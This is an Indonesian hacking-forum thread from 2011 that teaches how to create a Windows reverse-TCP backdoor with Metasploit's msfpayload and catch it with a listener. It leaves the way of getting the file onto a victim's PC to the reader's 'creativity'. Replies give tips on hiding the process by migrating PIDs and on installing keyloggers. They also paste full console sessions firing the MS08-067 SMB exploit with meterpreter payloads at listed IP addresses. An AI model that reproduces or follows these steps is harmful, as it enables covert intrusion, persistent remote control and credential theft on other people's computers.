msfpayload windows/shell/reverse_tcp - Printable Version +- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum) +-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html) +--- Forum: Exploitation (https://www.indonesianbacktrack.or.id/forum/forum-43.html) +---- Forum: Metasploit (https://www.indonesianbacktrack.or.id/forum/forum-122.html) +---- Thread: msfpayload windows/shell/reverse_tcp (/thread-358.html) Pages:
1
2
|
msfpayload windows/shell/reverse_tcp - zee eichel - 07-09-2011 weleh hari ini binun mau post apa.. tapi pas mampir ke mabes IBT tadi pagi jadi gatel kepingin nulis lagi ..heheheh ya udah langsung aja ya… sesuai dengan judulnya kita akan belajar membuat salah satu backdoor reverse_tcp dengan metasploit. nah gw ( zee eichel yang ganteng ) menguji coba tutor ini langsung dari markas IBT menggunakan backtrack 5 gnome. Langkah pertama : 1 sesuai dengan yang kita bicarain tadi .. yaitu backdoor .. tentu saja seperti biasanya kita mesti bikin backdoor nya dulu di liat dari script di atas kita bisa tau bahwa backdoor tercipta bernama zee-reverse-shell.exe . tentu saja bisa di ganti semau anda.. dan LHOST jgn di lupa masukin IP address ente semua … oh ya destinasi filenya ada di tmp .. liat petikannya x > /tmp/….. bisa di ganti juga sesuai keperluan … 2. Step berikutnya kita harus mengupload shell tersebut pada pc target… caranya …??? ya tergantung selera dan kreasi anda semua hehehehhe 3. Anggap saja kita sudah mengupload shell tadi dan sekarang kita masukan perintah – perintah di bawah ini /msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.101 E LHOST = diisikan dengan ip address ente .. PAYLOAD = harus sama dengan backdoor .. 4. Disaat korban merunning backdoor ente maka yang terjadi adalah lalalalala ente mendapat akses shell langsung .. heheheh .. backdoor ini masih bisa di variasikan dengan PAYLOAD meterpreter.. namun sekali lagi ini adalah seni… jadi use your logic .. ane , zee eichel mohon pamit nyari jodoh ..hahahaha RE: msfpayload windows/shell/reverse_tcp - 9oBl4ck - 07-12-2011 nice share zee.... makin banyak tau ane tentang metasploit neeh RE: msfpayload windows/shell/reverse_tcp - koecroet - 08-30-2011 backdoor yg ini terlihat running di task manager wedus gk ya om ? RE: msfpayload windows/shell/reverse_tcp - iKONspirasi - 08-30-2011 (08-30-2011, 09:29 AM)koecroet Wrote: backdoor yg ini terlihat running di task manager wedus gk ya om ? kelihatan bro, tp kan bisa kita migrate ke PID lain klo pake meterpreter RE: msfpayload windows/shell/reverse_tcp - lau13 - 08-30-2011 nice info om zee... cari jodoh jgn pake jauh yahhh om ntr camp di lupakan lagi hehehehehehe.. RE: msfpayload windows/shell/reverse_tcp - koecroet - 08-30-2011 (08-30-2011, 03:08 PM)konspirasi Wrote:(08-30-2011, 09:29 AM)koecroet Wrote: backdoor yg ini terlihat running di task manager wedus gk ya om ? wih mantap om harus di coba !! RE: msfpayload windows/shell/reverse_tcp - ririaz - 09-14-2011 kaya gini gmn om nya: # cowsay++ ____________ < metasploit > ------------ \ ,__, \ (oo)____ (__) )\ ||--|| * =[ metasploit v4.0.1-dev [core:4.0 api:1.0] + -- --=[ 732 exploits - 374 auxiliary - 82 post + -- --=[ 227 payloads - 27 encoders - 8 nops =[ svn r13728 updated today (2011.09.13) msf > use exploit/windows/sm use exploit/windows/smb/ms03_049_netapi use exploit/windows/smb/ms08_067_netapi use exploit/windows/smb/ms04_007_killbill use exploit/windows/smb/ms09_050_smb2_negotiate_func_index use exploit/windows/smb/ms04_011_lsass use exploit/windows/smb/ms10_061_spoolss use exploit/windows/smb/ms04_031_netdde use exploit/windows/smb/netidentity_xtierrpcpipe use exploit/windows/smb/ms05_039_pnp use exploit/windows/smb/psexec use exploit/windows/smb/ms06_025_rasmans_reg use exploit/windows/smb/smb_relay use exploit/windows/smb/ms06_025_rras use exploit/windows/smb/timbuktu_plughntcommand_bof use exploit/windows/smb/ms06_040_netapi use exploit/windows/smtp/mailcarrier_smtp_ehlo use exploit/windows/smb/ms06_066_nwapi use exploit/windows/smtp/mercury_cram_md5 use exploit/windows/smb/ms06_066_nwwks use exploit/windows/smtp/ms03_046_exchange2000_xexch50 use exploit/windows/smb/ms06_070_wkssvc use exploit/windows/smtp/wmailserver use exploit/windows/smb/ms07_029_msdns_zonename use exploit/windows/smtp/ypops_overflow1 msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ms08_067_netapi) > set LHOST 192.168.88.252 LHOST => 192.168.88.252 msf exploit(ms08_067_netapi) > set RHOST 192.168.88.252 RHOST => 192.168.88.252 msf exploit(ms08_067_netapi) > exploit [-] Handler failed to bind to 192.168.88.252:4444 [*] Started reverse handler on 0.0.0.0:4444 [*] Automatically detecting the target... [*] Fingerprint: Windows XP - Service Pack 2+ - lang:English [-] Could not determine the exact service pack [*] Auto-targeting failed, use 'show targets' to manually select one [*] Exploit completed, but no session was created. msf exploit(ms08_067_netapi) > RE: msfpayload windows/shell/reverse_tcp - Junior Riau - 09-14-2011 (09-14-2011, 03:20 PM)ririaz Wrote: kaya gini gmn om nya: ini kayaknya g jalan,, perhatika but no session was created.,,, mirip yang saya coba kan kemaren",,g berhasill,, seperti nya ke blok firewall,, @ kak zhee,, saya coba pake meterpreter bind_tcp jga no session was created ,,gimana itu?? kalo g salah kalo session nya ada,kita bisa pasa keylogger juga ini erronya punya saya kak zhee =[ metasploit v3.7.0-release [core:3.7 api:1.0] + -- --=[ 684 exploits - 355 auxiliary + -- --=[ 217 payloads - 27 encoders - 8 nops msf exploit(ms08_067_netapi) > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp msf exploit(ms08_067_netapi) > set DCERPC::fake_bind_multi false DCERPC::fake_bind_multi => false msf exploit(ms08_067_netapi) > set RHOST 172.16.40.75 RHOST => 172.16.40.75 msf exploit(ms08_067_netapi) > exploit [*] Started bind handler [*] Automatically detecting the target... [*] Fingerprint: Windows XP - Service Pack 3 - lang:English [*] Selected Target: Windows XP SP3 English (NX) [*] Attempting to trigger the vulnerability... [*] Exploit completed, but no session was created. RE: msfpayload windows/shell/reverse_tcp - iKONspirasi - 09-15-2011 itu target pc di virtualisasi atau pc orang bro? klo pc orang, trus OS windowsnya asli, patch up to date atau ada antivirus n firewallnya ya ga bisa oiya FYI bind_tcp itu berarti arah exploit dari pc kita, sedangkan reverse exploit arahnya dari pc target RE: msfpayload windows/shell/reverse_tcp - ririaz - 09-15-2011 RE: msfpayload windows/shell/reverse_tcp kaya gini gmn om nya: # cowsay++ ____________ < metasploit > ------------ \ ,__, \ (oo)____ (__) )\ ||--|| * =[ metasploit v4.0.1-dev [core:4.0 api:1.0] + -- --=[ 732 exploits - 374 auxiliary - 82 post + -- --=[ 227 payloads - 27 encoders - 8 nops =[ svn r13728 updated today (2011.09.13) msf > use exploit/windows/sm use exploit/windows/smb/ms03_049_netapi use exploit/windows/smb/ms08_067_netapi use exploit/windows/smb/ms04_007_killbill use exploit/windows/smb/ms09_050_smb2_negotiate_func_index use exploit/windows/smb/ms04_011_lsass use exploit/windows/smb/ms10_061_spoolss use exploit/windows/smb/ms04_031_netdde use exploit/windows/smb/netidentity_xtierrpcpipe use exploit/windows/smb/ms05_039_pnp use exploit/windows/smb/psexec use exploit/windows/smb/ms06_025_rasmans_reg use exploit/windows/smb/smb_relay use exploit/windows/smb/ms06_025_rras use exploit/windows/smb/timbuktu_plughntcommand_bof use exploit/windows/smb/ms06_040_netapi use exploit/windows/smtp/mailcarrier_smtp_ehlo use exploit/windows/smb/ms06_066_nwapi use exploit/windows/smtp/mercury_cram_md5 use exploit/windows/smb/ms06_066_nwwks use exploit/windows/smtp/ms03_046_exchange2000_xexch50 use exploit/windows/smb/ms06_070_wkssvc use exploit/windows/smtp/wmailserver use exploit/windows/smb/ms07_029_msdns_zonename use exploit/windows/smtp/ypops_overflow1 msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ms08_067_netapi) > set LHOST 192.168.88.252 LHOST => 192.168.88.252 msf exploit(ms08_067_netapi) > set RHOST 192.168.88.252 RHOST => 192.168.88.252 msf exploit(ms08_067_netapi) > exploit [-] Handler failed to bind to 192.168.88.252:4444 [*] Started reverse handler on 0.0.0.0:4444 [*] Automatically detecting the target... [*] Fingerprint: Windows XP - Service Pack 2+ - lang:English [-] Could not determine the exact service pack [*] Auto-targeting failed, use 'show targets' to manually select one [*] Exploit completed, but no session was created. msf exploit(ms08_067_netapi) > ok om konsipirasi ,itu pake victim laf ane sendiri tp yg aneh om klo pake db_autopown -p -t -e -r itu session ny dapat bahkan smpe 2 session lagi . padahal firewall nya ane matiin tp antivirus running, itu bisa tembus om. tapi klo manual ko engga bisa nya aduhhhhh....lier abdi mahhhh.... |